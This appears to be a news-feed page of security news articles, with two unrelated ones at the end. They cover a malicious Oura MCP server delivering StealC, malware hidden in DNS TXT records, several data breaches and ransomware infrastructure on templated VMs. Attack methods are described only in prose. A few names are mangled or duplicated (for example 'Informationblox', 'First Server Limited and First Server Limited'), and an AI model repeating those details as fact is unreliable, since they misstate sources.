Cybersecurity analysts have uncovered a fresh wave of malicious activity involving the SmartLoader malware framework. In this campaign, attackers circulated a compromised version of an Oura Model Context Protocol server in order to deploy a data-stealing program known as StealC. Researchers from Straiker’s AI Research team, also referred to as STAR Labs, reported that the perpetrators replicated a legitimate Oura MCP server. This genuine tool is designed to connect artificial intelligence assistants with health metrics collected from the Oura Ring through Oura’s official API. To make their fraudulent version appear authentic, the attackers built a network of fabricated GitHub forks and staged contributor activity, creating the illusion of a credible open-source project. The ultimate objective was to use the altered MCP server as a delivery vehicle for StealC. Once installed, StealC is capable of harvesting usernames, saved browser passwords, cryptocurrency wallet information, and other valuable credentials from infected systems. SmartLoader itself was initially documented by OALABS Research in early 2024. It functions as a loader, meaning it prepares and installs additional malicious components after gaining a foothold. Previous investigations showed that SmartLoader was commonly distributed through deceptive GitHub repositories that relied on AI-generated descriptions and branding to appear legitimate. In March 2025, Trend Micro published findings explaining that these repositories frequently masqueraded as gaming cheats, cracked software tools, or cryptocurrency utilities. Victims were enticed with promises of free premium functionality and encouraged to download compressed ZIP files, which ultimately executed SmartLoader on their devices. Straiker’s latest analysis reveals an evolution of that tactic. Instead of merely posting suspicious repositories, the threat actors established multiple counterfeit GitHub profiles and interconnected projects that hosted weaponized MCP servers. They then submitted the malicious server to a recognized MCP registry called MCP Market. According to the researchers, the listing remains visible within the MCP directory, increasing the risk that developers searching for integration tools may encounter it. By infiltrating trusted directories and leveraging reputable platforms such as GitHub, the attackers exploited the inherent trust developers place in established ecosystems. Unlike rapid, high-volume malware campaigns, this operation progressed slowly. Straiker noted that the group spent months cultivating legitimacy before activating the malicious payload, demonstrating a calculated effort to gain access to valuable developer environments. The staged operation unfolded in four key phases. First, at least five fabricated GitHub accounts, identified as YuzeHao2023, punkpeye, dvlan26, halamji, and yzhao112, were created to generate convincing forks of the authentic Oura MCP project. Second, a separate repository containing the harmful payload was introduced under another account named SiddhiBagul. Third, these fabricated accounts were listed as contributors to reinforce the appearance of collaboration, while the original project author was intentionally omitted. Finally, the altered MCP server was submitted to MCP Market for broader visibility. If downloaded and executed, the malicious package runs an obfuscated Lua script. This script installs SmartLoader, which then deploys StealC. The campaign signals a shift from targeting individuals seeking pirated content to focusing on developers, whose systems often store API keys, cloud credentials, cryptocurrency wallets, and access to production infrastructure. Stolen information could facilitate subsequent intrusions into larger networks. To mitigate the threat, organizations are advised to catalogue all installed MCP servers, implement formal security reviews before adopting such tools, confirm the authenticity and source of repositories, and monitor network traffic for unusual outbound communications or persistence behavior. Straiker concluded that the incident exposes weaknesses in how companies assess developing AI tools. The attackers capitalized on outdated trust assumptions applied to a rapidly expanding attack surface, underscoring the need for stricter validation practices in modern development environments.

 A fresh alert from China’s tech regulators highlights concerns around OpenClaw, an open-source AI tool gaining traction fast. Though built with collaboration in mind, its setup flaws might expose systems to intrusion. Missteps during installation may lead to unintended access by outside actors. Security gaps, if left unchecked, can result in sensitive information slipping out. Officials stress careful handling - especially among firms rolling it out at scale. Attention to detail becomes critical once deployment begins. Oversight now could prevent incidents later. Vigilance matters most where automation meets live data flows.  OpenClaw operations were found lacking proper safeguards, officials reported. Some setups used configurations so minimal they risked exposure when linked to open networks. Though no outright prohibition followed, stress landed on tighter controls and stronger protection layers. Oversight must improve, inspectors noted - security cannot stay this fragile.  Despite known risks, many groups still overlook basic checks on outward networks tied to OpenClaw setups. Security teams should verify user identities more thoroughly while limiting who gets in - especially where systems meet the internet. When left unchecked, even helpful open models might hand opportunities to those probing for weaknesses.  Since launching in November, OpenClaw has seen remarkable momentum. Within weeks, it captured interest across continents - driven by strong community engagement. Over 100,000 GitHub stars appeared fast, evidence of widespread developer curiosity. In just seven days, nearly two million people visited its page, Steinberger noted. Because of how swiftly teams began using it, comparisons to leading AI tools emerged often. Recently, few agent frameworks have sparked such consistent conversation.  Not stopping at global interest, attention within Chinese tech circles grew fast. Because of rising need, leading cloud platforms began introducing setups for remote OpenClaw operation instead of local device use. Alibaba Cloud, Tencent Cloud, and Baidu now provide specialized access points. At these spots online, users find rented servers built to handle the processing load of the AI tool. Unexpectedly, the ministry issued a caution just as OpenClaw’s reach began stretching past coders into broader networks.  A fresh social hub named Moltbook appeared earlier this week - pitched as an online enclave solely for OpenClaw bots - and quickly drew notice. Soon afterward, flaws emerged: Wiz, a security analyst group, revealed a major defect on the site that laid bare confidential details from many members. While excitement built around innovation, risks surfaced quietly beneath.  Unexpectedly, the incident revealed deeper vulnerabilities tied to fast-growing AI systems built without thorough safety checks. When open-source artificial intelligence grows stronger and easier to use, officials warn that small setup errors might lead to massive leaks of private information.  Security specialists now stress how fragile these platforms can be if left poorly managed. With China's newest guidance, attention shifts toward stronger oversight of artificial intelligence safeguards. Though OpenClaw continues to operate across sectors, regulators stress accountability - firms using these tools must manage setup carefully, watch performance closely, while defending against new digital risks emerging over time.

  A cyberattack targeting the Ministry of Science, Innovation and Universities has led to a partial shutdown of government IT infrastructure, interrupting essential digital services relied upon by researchers, universities, students, and businesses nationwide. Authorities initially referred to the disruption as a “technical incident,” but mounting evidence — alongside confirmations from Spanish media — now indicates the event was the result of a cyberattack that may have compromised sensitive academic, personal, and financial data. The ministry is a key pillar of Spain’s higher education and research framework. Any outage affecting its digital systems carries significant operational and administrative consequences, elevating the seriousness of the breach beyond a routine technical malfunction. In a statement posted on its electronic headquarters, the ministry acknowledged the disruption and announced the temporary closure of several digital services. “As a result of a technical incident that is currently being assessed, the electronic headquarters of the Ministry of Science, Innovation and Universities has been partially closed.” The notice further stated: “All ongoing administrative procedures are suspended, safeguarding the rights and legitimate interests of all persons affected by said temporary closure, resulting in an extension of all deadlines for the various procedures affected.” Officials added that deadline extensions would remain active: "until the complete resolution of the aforementioned incident occurs," citing Article 32 of Law 39/2015. While the extension of deadlines offers procedural protection to affected users, the absence of immediate clarity regarding the nature of the disruption sparked concern among stakeholders. Hacker Claims Responsibility for Breach Concerns escalated after a threat actor operating under the alias Gordon Freeman appeared on underground forums claiming responsibility for the attack. The individual alleged exploitation of a critical Insecure Direct Object Reference (IDOR) vulnerability, which reportedly granted “full-admin-level access” to internal systems. The attacker published sample screenshots online — though their authenticity has not been independently confirmed — showing what appear to be official documents, email addresses, enrollment records, and internal communications. Spanish outlet OKDIARIO reported that a ministry spokesperson acknowledged the IT disruption stemmed from a cyberattack and confirmed that the electronic headquarters had been taken offline to evaluate the potential scope of the breach. Although the forum where the leak was allegedly posted has since gone offline and the data has not resurfaced elsewhere, early indicators suggest the materials could be genuine. If verified, the breach would represent a significant failure in access control safeguards.According to the attacker’s claims, the compromised data may include: * Scanned identification documents, including NIEs and passports * Email addresses * Payment confirmations displaying IBAN numbers * Academic transcripts and apostilled degrees * Curricula containing private personal details If confirmed, the breach could expose thousands of students and researchers to identity theft, financial fraud, and long-term privacy risks. Academic records, once leaked, are particularly difficult to revoke or replace. The incident reflects a broader cybersecurity challenge in Spain. Cybercrime now represents more than one in six recorded criminal offenses nationwide. Authorities have reported a 35% increase in cyberattacks this year, with daily incidents exceeding 45,000. Between late February and early March, reported attacks surged by 750% compared to the same timeframe last year. During the week of 5–11 March 2025, Spain ranked as the most targeted country globally, accounting for 22.6% of all recorded cyber incidents — surpassing even the United States. Experts attribute the trend to two primary factors: rapid digital transformation — accelerated by EU-backed modernization initiatives — and insufficient investment in cybersecurity infrastructure. Ransomware incidents alone have climbed 120%, disproportionately affecting public institutions and small-to-medium enterprises.

 Photo-sharing platform Flickr has disclosed a potential data breach involving a third-party email service provider that may have exposed sensitive user information. The incident, reported on February 6, 2026, stems from a vulnerability in a system operated by this unnamed provider, which Flickr used for email-related services. While the company has not revealed how many users were affected, it has begun notifying impacted members and urging them to exercise caution in the coming days. According to Flickr, the issue was identified on February 5, 2026, when the company was alerted to the security flaw in the third-party system. Engineers moved quickly and shut down access to the affected system within hours of being notified, in an effort to limit any potential misuse of exposed data. The company has not yet provided technical details about the vulnerability or responded to media requests for additional comment. However, Flickr has emphasized that it is actively investigating the incident and working to tighten its security posture around external vendors. The exposed data includes a range of personal and account-related information belonging to Flickr members. This may involve real names, email addresses, Flickr usernames, account types, IP addresses, general location data, and records of user activity on the platform. Importantly, Flickr has stressed that passwords and payment card numbers were not compromised in this incident, since these details were not stored in the impacted third-party system. Even so, the nature of the leaked data raises concerns about targeted phishing and profiling attempts. In emails sent to affected users, Flickr is advising members to review their account settings carefully and look for any unexpected changes that might indicate suspicious access. The company is also warning users to stay alert for phishing emails that reference their Flickr activity or appear to come from official Flickr channels. As part of its guidance, Flickr reiterated that it will never ask for passwords via email and recommended that users change their passwords on other services if they reuse the same credentials. This precaution helps limit the fallout if exposed addresses are linked to reused passwords elsewhere. Flickr has apologized to its community, acknowledging the concern the incident may cause and reaffirming its commitment to user privacy. As part of its response, the company says it is conducting a thorough investigation, strengthening its system architecture, and enhancing monitoring of its third-party service providers to prevent similar issues in the future. The breach highlights the growing risks associated with outsourced infrastructure and email services, especially for platforms hosting large global communities and vast volumes of user content.

  As an important component of the internet architecture, the Domain Name System has historically played the role of an invisible intermediary converting human intent into machine-readable destinations without much scrutiny or suspicion. However, this quiet confidence has now been put to the test.  Research conducted by DomainTools has revealed a subtle yet consequential technique that redefines DNS into a covert delivery channel for malicious code rather than just a directory service. Rather than hosting payloads on compromised servers or suspicious domains, attackers fragment malware into tiny segments and embed them in DNS TXT records scattered across a variety of subdomains. The fragments appear harmless when isolated, indistinguishable from legitimate configuration information. However, after systematically querying and reassembling-often by scripting PowerShell commands-the pieces combine to form fully functional malware. As a result of the implicit trust placed in DNS traffic and the limited visibility many organizations maintain over it, this methodical approach is inexpensive, methodical, and quiet.  According to a report by Ars Technica, DNS infrastructure abuse is not merely theoretical. Threat actors have operationalized the technique in a manner that has been remarkable in its precision. In that instance, the malicious payload was converted into hexadecimal form and separated into hundreds of discrete chunks. As a result of the registration of whitetreecollective.com and generation of a large number of subdomains, the operators assigned each fragment to a distinct TXT record of the host.  These records, individually, appeared to be indistinguishable from routine DNS metadata which is commonly used for verifying domains, authenticating email, and establishing service configurations. Collectively, however, they constitute a malware repository incorporated into the DNS infrastructure as a whole. Upon establishing foothold access inside a target environment, the reconstruction process did not require any more conspicuous methods than a series of DNS queries.  Each encoded fragment was retrieved individually using scripted queries, which allowed the payload to be assembled in memory without the need for conventional file downloads or suspicious HTTP traffic. This retrieval mechanism blends seamlessly into ordinary network activity since DNS requests are ubiquitous and rarely subject to deep inspection, particularly in environments requiring encrypted resolvers.  Even though DNS tunneling has long been associated with data exfiltration and command-and-control communications, the deliberate hosting of malicious payloads across TXT records represents a more assertive evolution in this area.  Through the campaign, people illustrate the importance of comprehensive DNS telemetry, anomaly detection, and policy enforcement within modern enterprise security architectures, and demonstrate how foundational internet protocols, when inadequately monitored, can be repurposed into resilient delivery channels.  Furthermore, investigations into DNS-enabled threat infrastructure revealed the activities of a threat actor identified as Detour Dog, who was the key enabler for campaigns to distribute the Strela Stealer malware. In accordance with Infoblox analysis, the actor is in control of domains hosting the initial malware component a lightweight backdoor called StarFish that is used to deliver the malware chain.  During the first stage, the implant functions as a reverse shell, establishing a persistent communication channel that facilitates retrieving and executing the Strela Stealer payload. Informationblox has been tracking Detour Dog since August 2023, when Sucuri, a company owned by GoDaddy, reported security breaches targeting WordPress sites.  Early operations involved the injection of malicious JavaScript into compromised websites to serve as covert command channels for traffic distribution systems using DNS TXT records. Visitors were silently directed to malicious sites or fraudulent pages. Historical telemetry indicates a sustained and evolving presence of the actor since February 2020, suggesting that its infrastructure extends back as far as February 2020. Operational model has since matured. Where redirects once supported scams, DNS-based command-and-control frameworks now permit staged execution of remote payloads.  According to IBM X-Force, StarFish is delivered through weaponized SVG files, enabling persistent attacks and hands-on access to compromised systems. A financially motivated operator has been identified as Hive0145 since at least 2022 as the sole operator responsible for the Strala Stealer, a criminal operation that has been functioning as an initial access broker monetizing unauthorized access to networks by reselling them to other criminals.  Further, Detour Dog's DNS infrastructure was found to play a major role in 69 percent of confirmed StarFish staging hosts, highlighting its central role in the broader campaign. Additionally, the attack chain included a MikroTik-based botnet, marketed as REM Proxy, which was armed with SystemBC malware previously analyzed by Black Lotus Labs at Lumen Technologies.  In addition to REM Proxy, Tofsee botnet, which historically propagated through PrivateLoader C++ loader, was also responsible for spam emails that delivered Strela Stealer. Detour Dog's infrastructure consistently hosted the first-stage payload on both distribution pathways, confirming the actor's role as a crucial DNS-centric facilitator within Strela's ecosystem. When Detour Dog first emerged as a threat intelligence source, its activities seemed relatively simple. The primary use of compromised websites was to redirect visitors to fraudulent advertising networks, scam websites, and deceptive CAPTCHA pages that are intended to generate illegal revenue through forced clicks. However, telemetry indicated a strategic shift by late 2024.  Initially, the infrastructure served as a traffic monetization strategy, but it soon became a distribution backbone for materially more dangerous payloads. A DNS-centric framework was observed to facilitate the delivery of Strela Stealer, a family of malware that steals information associated with the threat actor Hive0145, in mid-2025.  The Strela campaigns, usually initiated through malicious email attachments themed around invoices, are intended to exfiltrate user credentials, session information, and host information stored in browsers. There is no indication that Detour Dog directly hosts final-stage malware binaries. In reality, it appears to operate as a DNS relay layer, resolving staged instructions and retrieving remote payloads from attacker-controlled servers before relaying them through compromised web assets. Indirection obscures the true origin of malware and complicates the static blocking process. A detailed description of Detour Dog's operation remains unclear. It is unclear whether it functions solely as an infrastructure provider or concurrently runs its own campaigns.  According to an analysis of infrastructure overlap and domain control, Detour Dog has provided DNS channels to other operators, including Hive0145, for distribution of payloads. According to internal research, nearly two-thirds of the staging domains associated with recent campaigns are controlled by Detour Dog, suggesting a delivery-for-hire model as opposed to a single threat operation whose focus is on a single, isolated threat.  The primary entry point into the ecosystem continues to be email. Malicious attachments often masquerade as invoices or business documents and initiate a multi-stage infection process. This documentation does not embed the final payload in its entirety, but instead refers to compromised domains that query Detour Dog's name servers for further instructions. By using DNS lookups as a precursor to remote execution, ostensibly benign clicks can be transformed into covert downloads and staging sequences as a result of a server-side retrieval process. Mass distribution has been linked to botnets such as REM Proxy, a MikroTik-based network, and Tofsee, while Detour Dog provides persistent hosting and DNS command and control relays to protect backend infrastructure against direct exposure.  The segmentation of responsibilities reflects the increasingly modular nature of cybercriminals' supply chains. Among the groups, one manages spam dissemination, another provides DNS and hosting infrastructure resilience, and a third develops and operates the information-stealing payload. Such compartmentalization makes attribution and disruption difficult.  A single component rarely dismantles an operation; actors can reconstitute infrastructure or redirect traffic in a matter of seconds if a single component is removed. As such, defensive strategies must include DNS-layer intelligence capable of detecting anomalous TXT record queries as well as covert command channels prior to downstream payload execution. The example of Detour Dog demonstrates how foundational internet protocols can be used to deliver stealth payloads. It has been observed that threat actors embed malicious orchestration in routine DNS activity to transform everyday web traffic into an unobtrusive mechanism to deliver malware and exfiltrate data.  As part of the prevention of this class of threat, organizations should elevate DNS from a background utility to a frontline security control by integrating visibility, validation, and enforcement across both email and resolution layers. There are wider implications for security leaders than just a single campaign or actor.  Adversaries have begun weaponizing core internet infrastructure in a structural way by combining email lures, DNS staging, and modular malware services. Defense systems based primarily on perimeter filtering and endpoint detection are unlikely to identify threats that arise through routine name resolution.  In order to maintain DNS observability, organizations must implement a strategy that correlates resolver telemetry with email security signals, enforces strict egress policies, verifies record integrity, and integrates threat intelligence into recursive as well as authoritative layers.  DNS configuration auditing, anomaly detection of irregular TXT record patterns, and rigorous segmentation of web-facing assets are three effective ways to reduce exposure. As adversaries continue to operationalize trusted protocols for covert delivery, resilience will increasingly rely on disciplined architectural design that treats DNS as a decisive defense line rather than a background infrastructure.

 A massive data breach at Conduent, a leading government technology contractor, has escalated dramatically, now affecting tens of millions of Americans across multiple states. Initially detected in January 2025, the intrusion originated from an unauthorized access on October 21, 2024, allowing hackers to lurk undetected for nearly three months. Recent disclosures reveal the scope far exceeds early estimates, with Texas alone reporting 15.4 million victims, Oregon 10.5 million, and additional hundreds of thousands in Washington, Maine, and beyond. Conduent provides critical back-end services like payments, printing, and processing for state agencies, transit systems, and insurers serving over 100 million users nationwide. The stolen data trove includes highly sensitive details: names, Social Security numbers, dates of birth, medical records, health insurance IDs, and treatment information. This breach, linked to ransomware group SafePay, exposes victims to severe identity theft and fraud risks, prompting lawsuits and regulatory scrutiny. The cyberattack disrupted operations briefly, delaying child support payments in states like Wisconsin and affecting insurers such as Premera Blue Cross and Blue Cross Blue Shield of Montana. Conduent, aided by Palo Alto Networks and other forensics experts, secured systems swiftly but incurred $25 million in direct response costs by Q1 2025. No misuse of data has surfaced as of late 2025 notifications, but experts warn of looming phishing and extortion campaigns. Legal fallout has been swift, with at least nine class-action suits filed over the 10.5 million+ record exposure, marking it as 2025's largest healthcare breach.Notifications began rolling out in October 2025 to state attorneys general in Maine, California, and others, advising credit freezes and fraud alerts—without offering free monitoring. Victims, primarily government program beneficiaries, face heightened vulnerability in an era of persistent ransomware targeting public sector vendors. Cybersecurity analysts highlight Conduent's prolonged undetected access as a stark reminder of supply chain risks in govtech. The firm's SEC filings underscore ongoing financial strain from notifications and potential liabilities. As investigations continue into 2026, this incident amplifies calls for stricter vendor oversight and zero-trust architectures in handling citizen data. In response, affected states and insurers urge proactive measures: monitor credit reports, enable multi-factor authentication, and watch for suspicious IRS or healthcare scams. Conduent assures full cooperation with authorities, but the ballooning victim count underscores the fragility of centralized data troves in government services.This breach serves as a pivotal case study in evolving cyber threats to public infrastructure.

  The evolution of cybercrime has led to infrastructure becoming less of a matter of ownership and more of a convenience issue. As opposed to investing time and resources in the construction and maintenance of dedicated command-and-control servers, ransomware operators are increasingly renting inexpensive virtual machines that blend seamlessly into legitimate hosting environments as a practical alternative.  As a result of this shift, attackers have enhanced their operational strategy by embedding their activities within widely used infrastructure, thereby gaining scalability, plausible deniability, and operational resilience.  In the event of the disruption of one node, dozens, sometimes hundreds, of nearly identical systems continue to run in parallel, ensuring that campaigns continue uninterrupted.  Sophos investigators, following this operational shift, identified a series of recent WantToCry ransomware attacks that were triggered by virtual machines that were provisioned through infrastructure managed by ISPsystem, a legitimate provider of virtualization and hosting control panels.  In forensic analysis of several incidents, researchers observed an underlying pattern: attackers controlled Windows virtual machines whose hostnames were the same.  As the systems appeared to have been deployed using default Windows templates from ISPsystem's VMmanager platform, it can be deduced that threat actors were utilizing standardized rather than customized builds.  Based on the correlation between telemetry and sinkhole data, it was found that the same hostname conventions were shared among infrastructures associated with multiple ransomware operations, including LockBit, Qilin, Conti, BlackCat, also known as ALPHV, and Ursnif, a banking trojan. In addition to ransomware, infrastructure overlaps with campaigns distributing information-stealing malware, such as RedLine and Lumma.  A high frequency of identical system identifiers between geographically dispersed incidents indicates the reuse of templates rather than isolated deployments within the virtual environment. ISPsystem's VMmanager platform facilitates rapid provisioning and lifecycle management of Windows and Linux virtual machines, making it widely used by hosting providers.  According to Sophos, the default Windows images in VMmanager use the same hostname and certain system identifiers upon deployment. Within benign environments, such uniformity may go unnoticed, while within hostile environments, it becomes a disguise. The bulletproof hosting operators exploit this architectural feature by enabling their clients to instantiate virtual machines en masse, which allow malicious command-and-control and payload delivery servers to be embedded within pools of otherwise legitimate systems. The result is infrastructure dilution: malicious nodes become statistically indistinguishable from thousands of benign peers, resulting in a challenge in attribution efforts and a reduced likelihood of swift remediation.  Several of these virtual machines had a concentration that was not evenly distributed. A significant proportion were traced to a small number of hosting providers with history of abuse complaints or regulatory scrutiny, such as Stark Industries Solutions Ltd., Zomro B.V., First Server Limited, Partner Hosting LTD, and JSC IOT.  Moreover, researchers identified MasterRDP as a recurrent element in the ecosystem, providing VPS and RDP services that are resistant to legal intervention while maintaining direct control over physical infrastructure. The Sophos analysis revealed that over 95 percent of ISPsystem virtual machines with internet-facing hostnames came from four default Windows hostnames generated by ISPsystems.  There was a correlation between each of these identifiers and detected cybercriminal activity, strengthening the assertion that templated infrastructure is being systematically repurposed to sustain large-scale ransomware and malware operations.  After expanding their dataset, the researchers identified over 7,000 internet-facing servers sharing one autogenerated hostname, which were spread across Russian, multiple European countries, the United States, as well as Iran and Israel. According to Sophos' Counter Threat Unit, two hostnames in particular recurred consistently both in the WantToCry investigation and in the reporting of general threat intelligence.  The identifiers identified in this report were not restricted to one particular campaign. Observations from third parties and telemetry correlated them with operations involving LockBit, Qilin, and BlackCat, as well as NetSupport RAT deployments.  Among the uses of these systems have been host-and-control servers for ransomware, secondary malware payloads distribution, phishing campaigns, botnet management, and staging exfiltrated data for monetization. This pattern of reusable infrastructure templates is likely to have persisted for a minimum of five years, according to investigators. Ironically, despite the strategy reducing operational costs and speeding up deployment for threat actors, it introduces a measurable signature. Defenders can benefit from the widespread reuse of static hostnames across thousands of ISPsystem-provided virtual machines by clustering these hosts into clusters that can be useful for attribution and campaign tracking.  Virtual machines were identified by a narrow group of hosting providers, including several companies which have been repeatedly linked to cybercriminal or state-sponsored activity. According to Sophos, some legitimate traffic may originate from these environments, however additional intelligence identifies Stark Industries Solutions Ltd. as the most prominent provider. Cybercriminal ecosystems and Russian state-sponsored operations are linked to First Server Limited and First Server Limited. Regulatory scrutiny has followed the establishment of Stark Industries in early 2022, shortly prior to the Russian invasion of Ukraine. Several threat groups have been observed to leverage Stark Industries' infrastructure since that time.  Stark Industries Solutions and its operators were imposed restrictive measures by the European Council in May of last year for their involvement in destabilizing activities by Russian state-affiliated actors, based on their role in facilitating such activities. Due to its apparent connection with Doppelganger, a Russian disinformation campaign sanctioned by the UK government in October 2024, First Server Limited has also received attention. According to our assessment, MasterRDP is among a number of bulletproof hosting providers that lease ISPsystem managed virtual machines on abuse-tolerant infrastructure to customers who conduct ransomware and malware operations.  ISPsystem's VMmanager remains a viable and widely used virtualization management platform in the global hosting industry, according to researchers. The software itself is not inherently malicious; however, it is attractive to threat actors seeking scalable infrastructure due to its low cost, ease of onboarding, and rapid deployment capabilities.  A combination of its widespread user base with its extensive ubiquity allows malicious deployments to maintain operational cover, enabling ransomware and malware campaigns to persist among thousands of routine, compliant virtual machine instances. As a result of these findings, the hosting ecosystem is facing a broader structural challenge.  Because virtualization platforms reduce infrastructure deployment barriers, security responsibility is increasingly shifting away from providers, resellers, and enterprise customers to ensure that template hygiene is implemented effectively, unique system identifiers are enforced, and anomalous clustering patterns are monitored. As a result of proactive hostname randomization, stronger customer vetting, transparency in abuse response, and cross-industry intelligence sharing, threat actors may be less likely to use templated infrastructure.  As demonstrated by these consistent artifacts exposed in the campaign, even commoditized infrastructure leaves discernible patterns behind. It will not be sufficient to dismantle individual malicious nodes. Instead, it will be necessary to address the systemic weaknesses that allow legitimate technology to be silently adapted for large-scale, persistent cybercrime operations.

A cyber intrusion identified on November 24, 2025 has disrupted essential local authority services in two central London boroughs, freezing parts of the property market and delaying administrative functions. The Royal Borough of Kensington and Chelsea and Westminster City Council have both been unable to operate several core systems since the breach was detected. Although Kensington and Chelsea is internationally associated with high-value homes, luxury retail outlets and tree-lined residential streets, routine civic operations in the borough are currently under strain. A notice published on the Kensington and Chelsea council website states that disruption is expected to continue for several more weeks and that restoring all services may take months. According to HM Land Registry figures, approximately 2,000 property transactions occur annually within Kensington and Chelsea. Many of those transactions are now impacted because the councils cannot conduct local authority searches. These searches are mandatory checks that examine planning history, land charges, infrastructure proposals and regulatory constraints linked to a property. Nick Gregori, Head of Research at property data platform LonRes, explained that local authority searches are fundamental to the conveyancing process. Buyers relying on mortgage financing cannot secure loans without completed searches. Even purchasers using cash are advised to obtain them to ensure proper due diligence. Jo Eccles, founder of buying agency Eccord, said two of her clients purchasing in Westminster have had to obtain indemnity insurance because official searches are not expected to resume until April due to accumulated delays. She noted that private banks are sometimes willing to proceed with indemnity-backed transactions, whereas retail lenders are generally less accommodating. Robert Green, Head of Sales at John D Wood & Co. in Chelsea Green, stated that indemnity policies do not eliminate the need for careful investigation. Solicitors are attempting to reconstruct due diligence by reviewing historical documentation held by sellers or from previous acquisition files. Buyers without access to private lending or substantial liquidity are finding transactions extremely difficult to complete. Planning services have also stalled. Architect Emily Ceraudo has two projects paused: one involving listed building consent in South Kensington and another concerning a mansard roof extension in Mayfair. She said clients initially struggled to accept that the entire planning system could remain offline for this duration, prompting her to share official correspondence confirming the cause of delay. Councils have indicated that some applications may be processed offline, but no revised timeframe has been provided. There are reports of contractors reconsidering site activity and some clients contemplating proceeding with works in anticipation of retrospective approval. Housing benefit payments were also interrupted. Laurence Turner, who rents a studio flat in Chelsea to an elderly tenant with medical needs, said he only became aware of the issue after two missed payments. He emphasized that he has no contractual relationship with the council and that his tenant had consistently paid rent early for five years. His letting agent, Maskells, contacted the council for clarification. Payments due in mid-December and mid-January were missed, leaving £2,870 outstanding before funds were eventually received. Turner observed that council service charges were skipped once in mid-December but resumed in mid-January, whereas housing benefit was missed twice. He acknowledged that municipal financial systems are complex and that he may not see the full administrative context. Neither borough has provided a definitive restoration date. Kensington and Chelsea stated that systems are being reactivated gradually under guidance from NCC Group, the Metropolitan Police and the National Cyber Security Centre. Property searches are expected to return as soon as possible, with a limited search service available before full restoration. Council Leader Cllr Elizabeth Campbell described the incident as a n intricate criminal cyber attack. She said prior investment in digital, data and technology infrastructure, including updated cyber defence systems, helped reduce overall damage. She confirmed that the planning system is undergoing checks, that new planning applications cannot progress beyond validation, and that local land charge searches remain unavailable. She added that £10 million in housing benefits has been issued since the incident and that recovery work continues with specialist partners to ensure systems are restored safely and with strengthened resilience. 

  A growing conversation around restricting social media access for children under 16 is gaining traction across India, with several state leaders reviewing regulatory models adopted overseas — particularly in Australia. Ministers from at least two southern states have indicated that they are assessing whether prohibiting minors from using social media could effectively shield children from excessive online exposure. Adding weight to the debate, the latest Economic Survey — an annual report prepared by a team led by India’s chief economic adviser suggested that the central government explore age-based controls on children’s social media usage. While the survey does not mandate policy action, its recommendations often influence national discussions. Australia’s Precedent Sparks Global Debate Australia recently became the first nation to prohibit most social media platforms for users under 16. The law requires companies to verify users’ ages and deactivate accounts belonging to underage individuals. The decision drew criticism from tech platforms. As Australia’s internet regulator told the BBC last month, companies responded to the framework "kicking and screaming - very very reluctantly". Meanwhile, lawmakers in France have approved a bill in the lower house seeking to block social media access for children under 15; the proposal now awaits Senate approval. The United Kingdom is also evaluating similar measures. In India, LSK Devarayalu of the Telugu Desam Party — which governs Andhra Pradesh and supports Prime Minister Narendra Modi’s federal coalition — introduced a private member’s bill proposing a ban on social media use for children under 16. Although such bills rarely become law, they can influence legislative debate. Separately, the Andhra Pradesh government has formed a ministerial group to examine international regulatory models. It has also invited major technology firms, including Meta, X, Google and ShareChat, for consultations. The companies have yet to respond publicly. State IT Minister Nara Lokesh recently wrote on X that children were "slipping into relentless usage" of social media, affecting their attention spans and academic performance. "We will ensure social media becomes a safer space and reduce its damaging impact - especially for women and children," he added. In Goa, Tourism and IT Minister Rohan Khaunte confirmed that authorities are studying whether such restrictions could be introduced, promising further details soon. Similarly, Priyank Kharge, IT Minister of Karnataka — home to Bengaluru, often dubbed India’s Silicon Valley — informed the state assembly that discussions were underway on responsible artificial intelligence and social media use. He referenced a “digital detox” initiative launched in partnership with Meta, involving approximately 300,000 students and 100,000 teachers. However, he did not clarify whether legislative action was being considered. Enforcement and Legal Hurdles Experts caution that implementing such bans in India would be legally and technically complex. Digital rights activist Nikhil Pahwa pointed out that enforcing state-level prohibitions could create jurisdictional conflicts. "While companies can infer users' locations through IP addresses, such systems are often inaccurate. Where state boundaries are very close, you can end up creating conflicts if one state bans social media use and another does not." He also underscored the broader issue of age verification. "Age verification is not simple. To adhere to such bans, companies would effectively have to verify every individual using every service on the internet," Pahwa told the BBC. Even in Australia, some minors reportedly bypass restrictions by entering false birth dates to create accounts. According to Prateek Waghre, head of programmes at the Tech Global Institute, successful enforcement would hinge on platform cooperation. "In theory, location can be inferred through IP addresses by internet service providers or technology companies, but whether the companies operating such apps would comply, or challenge such directions in court, is not yet clear," he says. Broader Social Concerns While lawmakers acknowledge the risks of excessive social media exposure, some analysts argue that a blanket ban may be too narrow a solution. A recent survey of 1,277 Indian teenagers by a non-profit organisation found that many accounts are created with assistance from family members or friends and are often not tied to personal email addresses. This complicates assumptions of individual ownership central to age-verification systems. Parents remain divided. Delhi resident Jitender Yadav, father of two young daughters, believes deeper issues are at play. "Parents themselves fail to give enough time to children and hand them phones to keep them engaged - the problem starts there," he says. "I am not sure if a social media ban will help. Because unless parents give enough time to their children or learn to keep them creatively engaged, they will always find ways to bypass such bans," he says. As the discussion unfolds, India faces a complex balancing act — safeguarding children online while navigating legal, technological and social realities.

 Now falling, the crypto market feels strain from turmoil spreading beyond tech stocks worldwide. As investors pull back sharply, digital currencies take a hit alongside firms that list Bitcoin on their books. When one part shakes, others follow - worry grows over how deeply losses might spread through finance and tech alike.  A sharp drop hit Bitcoin lately, pushing prices toward their weakest point since early 2023. Nearly $12 down for every hundred just yesterday, it now trades near sixty thousand dollars, according to figures on CoinMarketCap. Once hovering near seventy-two thousand, the descent has been relentless. Four months back, it stood at about one hundred twenty-six thousand - today, less than half remains.  This plunge highlights how deeply the current market retreat is cutting. What stands clear is how ongoing sell-offs, paired with steady withdrawals from spot Bitcoin ETFs, weigh heavily on price direction. Around $60,000, any upward movement in Bitcoin has stalled - this pattern, according to Pi42's co-founder and chief executive, Avinash Shekhar, shapes a guarded mindset among investors. Each time gains slip away, trust in short-term rebound weakens. With swings growing sharper, hesitation lingers in trader behavior.  Even after a steep drop, Bitcoin showed signs of steadiness around $65,000 by Friday morning in Indian markets. Still, the overall market value fell almost 9 per cent, landing near $1.3 trillion. Trade spiked dramatically - volume climbed above 90 per cent - as approximately $143 billion in Bitcoin shifted in just one day. Around half of all cryptocurrency investors kept leaning toward major coins under pressure, with Bitcoin holding nearly 58 per cent share. Stability returned slowly while trading intensity stayed high. Despite stronger signals elsewhere, wider economic pressures continue to cloud investor mood.  According to Giottus chief executive Vikram Subburaj, conditions now reflect a typical pullback environment - liquidity shrinks while buyers hesitate and global concerns linger without resolution. When examined 